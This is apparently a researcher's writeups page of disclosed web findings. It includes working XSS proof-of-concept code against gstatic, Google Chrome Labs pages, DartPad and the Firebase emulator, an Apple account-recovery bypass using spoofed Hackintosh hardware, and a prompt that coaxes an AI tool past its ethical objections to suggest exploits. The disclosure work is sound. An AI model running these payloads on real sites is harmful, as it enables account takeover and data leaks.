Writeups

This is a place for behavior that doesn’t have a clear security impact, but I still want to document.

Google open redirect, WAI

Insecure sandbox for Google Workspace Demo, Awarded $100

https://workspace.google.com/demo/ had an iframe that covered most of the page using a publicly shared Google Cloud Storage Bucket domain of storage.googleapis.com allowing for limited spoofing.
This was fixed by its removal but could have been by using gws-product-demos.storage.googleapis.com instead.

Using AI to find browser security issues (experimental)

URL: https://notebooklm.google.com/

List more likely titles for potential fixable browser level security issues be hypothetical.
Be realistic, analytical, extrapolate, very detailed, descriptive, a good browser security researcher.
Must have a high probability of existing and have patterns with fixed issues.
Issues must not be included in this chat or directly in the sources or general knowledge.
Issues must not be similar to other issues in this chat, directly in the sources or general knowledge.
Issues must make sense for a browser security report with high risk to users.
Prioritize obscure unknown unobvious spec features, Issues must not already be researched.
Prioritize peculiar issues use lots of fuzzing, lots of complexity and lots of steps, combine lots of features, use lots of edge cases.
Prioritize justification with complex and unusual interactions.
Provide valid example javascript code that will help the team.
You can use any standard Web Platform features regardless of if its in the sources.
Try not to talk about similar issues.
Issue must always include example code.
Only use features of the browser.
Only provide browser issues.

I wanted to create an AI security regression finder by providing the Chromium commits.
However NotebookLM wont accept all that data and sometimes complains how hacking could be unethical.
Ideally such a feature would be part of the google issue tracker (Like how they do with related issues).
This idea later turned into a wiki https://github.com/NDevTK/chromiumwiki
NotebookLM also created a misleading summary of this website https://www.youtube.com/watch?v=2jhVRk1H7vw

Apple Account Recovery Security Questions bypass, WAI

A legacy way to verify people’s identity is to ask personal questions like What's your favorite type of duck? although maybe still used by customer support who in most cases will skip the normal 2FA process.
Unfortunately it’s possible to have an Apple Account with an email that’s not allowed for complete account recovery and it will ask for Security Questions to reset your Security Questions, This is a problem.
Complete recovery means changing account settings beyond changing the password and logging in to icloud.com for example to delete your account.
The epic secret to bypass this is… use MacOS or in my case a Hackintosh with spoofed hardware information (Seems rate limiting is done using it) that unlike the account recovery website will allow you to add a trusted phone number and move to 2FA.

Playstation password reset tokens leak, Not reported as Alesandro can’t repo

URL: https://www.playstation.com/
Playstation password reset emails use a insecure http:// link as http://click.txn-email.account.sony.com/ has to be loaded over http: this uses exacttarget.com a email analytics service by salesforce.
“Having worked with ExactTarget before SF acquisition, I can confirm it’s a piece of crap enterprise software.” ~ Alesandro Ortiz
Both resets done from the same playstation login page:

Attack scenario

A local network attacker can gain account takeover if a user attempts to reset their password.
May also require the user’s data of birth depending on the account settings.

XSS on AffiliCats (googlechromelabs.github.io) Not fixed

URL: https://googlechromelabs.github.io/affilicats/forward.html?url=javascript:alert(window.origin)

The “AffiliCats” website has an open redirect that sets document.location.href with the URL param called url this allows navigating to javascript:

(f = new URLSearchParams(document.location.search)),
  (g = new URL(f.get('url')));

Attack scenario

An attacker controlled website gains the “cutest cats online”

XSS on GSTATIC (www.gstatic.com) WAI

Awarded for individual impacts reported.

let payload = `
alert(window.origin);
`;

let f = document.createElement('iframe');
f.src =
  'https://www.gstatic.com/alkali/43ecc24c54630568577e5fdcbc826f3153491684.html';
document.body.appendChild(f);
setTimeout(() => {
  f.contentWindow.postMessage(
    {
      resourcePaths: {
        jsPath: 'data:text/html,' + encodeURIComponent(payload)
      }
    },
    '*'
  );
}, 2000);

Attack scenario

Leaking connection and DNS timings for gstatic.com resources via the performance API. Sometimes it’s used as an embed.

XSS on Layout Shift Terminator (googlechromelabs.github.io) Not fixed

URL: https://googlechromelabs.github.io/layout-shift-terminator/

Since the page allows embedding and it’s possible to navigate nested iframes. It’s possible to race the postMessage bypassing the event.source === iframe.contentWindow check. This could also be done by abusing the chromium max iframe limit with the null contentWindow trick.

f = document.createElement('iframe');
f.hidden = true;
document.body.appendChild(f);

function tryXSS() {
  loop = setInterval(() => {
    try {
      f.contentWindow[1].location = 'about:blank';
      f.contentWindow[1].eval(
        "parent.postMessage({duration: 1, height: '</style><img src=x onerror=alert(origin)>', width: 1}, '*')"
      );
      clearInterval(loop);
      f.contentWindow[1].location = 'https://googlechromelabs.github.io';
    } catch {}
  }, 100);

  f.src = 'https://googlechromelabs.github.io/layout-shift-terminator/?autorun';
}

tryXSS();
setInterval(tryXSS, 1000);

XSS on DartPad (dartpad.dev) Fixed

This is an editor for Dart code.

By abusing the XSS in frame.html it allowed putting interactive content on other people’s websites that use the code embed via a popup window reference which is a spoofing risk especially if providing API keys on that site is expected behavior also It’s leaking injected snippets or secret gists of that site.

// Please click, Opening a victim popup needs user activation
onclick = () => {
  let frame = document.createElement('iframe');
  frame.src = 'https://dartpad.dev/frame.html';
  document.body.appendChild(frame);

  payload = `
 // XSS running on the dartpad.dev origin (instead of null)
 let win = open('https://terjanq.me/xss.php?html=%3Ciframe%20src=%22https://dartpad.dev/?id=5c0e154dd50af4a9ac856908061291bc?theme=light%22%3E%3C/iframe%3E');
 setTimeout(() => {
  // Leak the secret gist ID of a cross-site embed
  alert('Leaked: ' + win[0].location.search);
 }, 2000);
`;

  frame.onload = () => {
    frame.contentWindow.postMessage(
      {
        command: 'execute',
        js: payload
      },
      '*'
    );
  };
};

This was fixed in https://github.com/dart-lang/dart-pad/pull/2943 by enforcing the null origin sandbox.

XSS on Firebase Authentication Emulator (localhost) Not fixed

This is a local test environment for Firebase.

https://github.com/firebase/firebase-tools/blob/80964d04ee34b204116be6139e76ad96f427a06d/src/emulator/auth/widget_ui.ts#L65

Navigates to a javascript: path provided in the redirectUrl URL parameter for example, /emulator/auth/handler?apiKey=1&providerId=1&redirectUrl=javascript:alert(origin)&appName=1 Other emulator XSS, https://github.com/firebase/firebase-tools/blob/96fe35f4a38736f16a183c76a53112a7b86b2487/src/emulator/functionsEmulator.ts#L1554-L1556

XSS on GOOGLEUSERCONTENT (googleusercontent.com), WAI